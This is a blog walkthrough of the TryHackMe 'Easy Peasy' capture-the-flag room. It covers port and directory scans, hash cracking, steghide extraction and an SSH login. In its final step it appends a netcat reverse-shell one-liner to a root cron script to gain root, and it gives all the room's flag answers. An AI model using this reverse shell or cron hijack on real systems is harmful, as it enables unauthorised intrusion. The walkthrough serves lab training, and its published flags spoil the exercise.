Home
Gazette
Reporter
Favorite
Prize
Pricing
About
Terms
Legals
Video
Contact
Login...
   Gazette    Reporter

CTF Walk Through | Jamshedpur | [email protected]

2 subscriber(s)


26/10/2024 Shad Hussain Knowledge Views 39 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Easy Peasy - THM 

Room Link : https://tryhackme.com/r/room/easypeasyctf


STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.209.133
FINDING
PORT      STATE    SERVICE VERSION
80/tcp    open     http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-robots.txt: 1 disallowed entry 
|_http-title: Welcome to nginx!
6498/tcp  open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open     http    Apache httpd 2.4.43 ((Ubuntu))
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-robots.txt: 1 disallowed entry 
QUESTION
How many ports are open?
3
QUESTION
What is the version of nginx?
1.16.1
QUESTION
What is running on the highest port?
Apache
--------------------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.209.133

FINDING
---- Entering directory: http://10.10.209.133/hidden/whatever/ 
---- Go to page sourse you will find p hiddenZmxhZ3tmMXJzN19mbDRnfQ==/p
---- use https://hashes.com/en/decrypt/hash to crack ZmxhZ3tmMXJzN19mbDRnfQ==
QUESTION
Using GoBuster, find flag 1.
flag{f1rs7_fl4g}
--------------------------------------------------------------------------------------------------------
STEP3
dirb http://10.10.209.133:65524/

http://10.10.209.133:65524/robots.txt

FINDING
+ http://10.10.209.133:65524/robots.txt (CODE:200|SIZE:153)  
User-Agent:a18672860d0510e5ab6699730763b250
---- use https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250 to crack and get flag{1m_s3c0nd_fl4g}
QUESTION
Further enumerate the machine, what is flag 2?
flag{1m_s3c0nd_fl4g}
--------------------------------------------------------------------------------------------------------
STEP3
dirb http://10.10.209.133:65524/

http://10.10.209.133:65524/ 
FINDING
+ http://10.10.209.133:65524/index.html (CODE:200|SIZE:10818) 
you will find flag3 on the page
---- use https://hashes.com/en/decrypt/hash to crack 9fdafbd64c47471a8f54cd3fc64cd312 is candeger
QUESTION
Crack the hash with easypeasy.txt, What is the flag 3?
flag{9fdafbd64c47471a8f54cd3fc64cd312}
--------------------------------------------------------------------------------------------------------
STEP4
dirb http://10.10.209.133:65524/

http://10.10.209.133:65524/ 
---- go to page sourse nd get  p hiddenits encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu/p
FINDING
+ http://10.10.209.133:65524/index.html (CODE:200|SIZE:10818) 
https://www.better-converter.com/Encoders-Decoders/Base62-Decode and decode ObsJmP173N2X6dOrAgEAL0Vu and get 
/n0th1ng3ls3m4tt3r
What is the hidden directory?
/n0th1ng3ls3m4tt3r
--------------------------------------------------------------------------------------------------------
STEP5
http://10.10.209.133:65524/n0th1ng3ls3m4tt3r/

---- go to page sourse and get p940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81/p
---- use https://md5hashing.net/hash/gost/940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81 to get mypasswordforthatjob
FINDING
download the image on top middle
---- use steghide extract -sf binarycodepixabay.jpg
---- with passphrase mypasswordforthatjob
---- get a file secrettext.txt on Desktop
QUESTION
Using the wordlist that provided to you in this task crack the hash
what is the password?
mypasswordforthatjob
--------------------------------------------------------------------------------------------------------
STEP6
---- open secrettext.txt
FINDING
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
---- use https://www.morsecodeninja.com/binary.html

---- password : iconvertedmypasswordtobinary
QUESTION
What is the password to login to the machine via SSH?
iconvertedmypasswordtobinary
--------------------------------------------------------------------------------------------------------
STEP7
ssh [email protected] -p 6498
password : iconvertedmypasswordtobinary
ls -la
cat user.txt
QUESTION
What is the user flag?
flag{n0wits33msn0rm4l}
--------------------------------------------------------------------------------------------------------
STEP8
cat /etc/crontab
FINDING
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh
echo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc 10.0.0.1 1234 /tmp/f  /var/www/.mysecretcronjob.sh
open ---- nc -nvlp 1234 listner on new terminal
on ssh terminal execute /var/www/./.mysecretcronjob.sh
on new terminal
cd /root
cat .root.txt
QUESTION
What is the root flag?
flag{63a9f0ea7bb98050796b649e85481845}
--------------------------------------------------------------------------------------------------------

Related articles
24.10.2024 Shad Hussain Readers 71
CTF Walk Through - BreakOut - VulnHub  Machine Link : https://www.vulnhub.com/entry/empire-breakout,751/ step1 : a .....
23.10.2024 Shad Hussain Readers 78
CTF Walk Through - Bounty Hacker - THM  Room link : https://tryhackme.com/r/room/cowboyhacker STEP1 nmap http://10. .....
14.05.2024 mutebreak Readers 236
Benefits of taking a Certified Ethical Hacking (CEH) course  Comprehensive Knowledge: Gain in-depth knowledge of hacking techniques and t .....
14.05.2024 mutebreak Readers 257
A bug bounty hunting course can offer numerous benefits, ra  Skill Enhancement: Develop advanced skills in identifying and exploiting vul .....
14.05.2024 mutebreak Readers 418
A Web Application Penetration Testing (WAPT) course can pro  Comprehensive Understanding of Web Security: Gain a thorough understanding o .....
18.05.2024 mutebreak Readers 347
Learning Android penetration testing offers a wealth of ben  Enhanced Security Awareness: Understanding the unique vulnerabilities of the A .....
20.05.2024 mutebreak Readers 312
Benefits of a Red Teaming Course for Job Prospects  Enhanced Skill Set: Gain in-depth knowledge and practical skills in ethical .....
18.05.2024 mutebreak Readers 439
Learning API penetration testing offers extensive benefits,  Enrolling in a comprehensive course on API penetration testing offers numerous .....
30.11.2018 shad hussain Readers 1.3K
5 smart tips to succeed in your start-up 4th will surprise   In nearly all the public speaking engagements that I attend and almost every on .....
 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved